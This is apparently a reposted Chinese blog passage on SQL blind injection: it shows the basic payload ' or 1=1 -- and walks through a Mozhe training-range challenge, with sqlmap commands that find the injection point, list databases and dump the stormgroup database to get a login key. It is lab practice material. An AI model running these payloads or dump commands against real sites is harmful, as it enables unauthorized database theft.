如何用SQLMap进行SQL盲注测试

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了如何用SQLMap进行SQL盲注测试相关的知识,希望对你有一定的参考价值。

参考技术A 如何用SQLMap进行SQL盲注测试
SQL盲注:用SQL查询语句去猜解表名、字段、数据。
拿个简单的查询来说
select * from table where 条件='' or 1=1 --'
也就是在你的查询参数中加入:' or 1=1 --
其他改、删类似,注入的方式有很多种,以上只是最基本的一种。

墨者靶场 SQL注入漏洞测试(布尔盲注)

一、查看页面源代码,发现注入点

image-20210614220555492

二、sqlmap一把梭

┌──(root💀caozhenguo)-[~/桌面]
└─# sqlmap -u http://219.153.49.228:40972/new_list.php?id=1

image-20210614220818565

查询库
┌──(root💀caozhenguo)-[~/桌面]
└─# sqlmap -u http://219.153.49.228:40972/new_list.php?id=1 --dbs

image-20210614221353476

输出全部数据
┌──(root💀caozhenguo)-[~/桌面]
└─# sqlmap -u http://219.153.49.228:40972/new_list.php?id=1 -D stormgroup --dump

image-20210614221452545

解码 status=1 的密码

image-20210614221640217

三、登录查看到key

image-20210614221737022

以上是关于如何用SQLMap进行SQL盲注测试的主要内容,如果未能解决你的问题,请参考以下文章

墨者靶场 SQL注入漏洞测试(布尔盲注)

墨者靶场 SQL注入漏洞测试(布尔盲注)

CTFHub——技能树——SQL注入(sqlmap)

SQL注入-布尔盲注实例

Security ❀ SQL Injection (Blind) SQL盲注

SQL盲注工具BBQSQL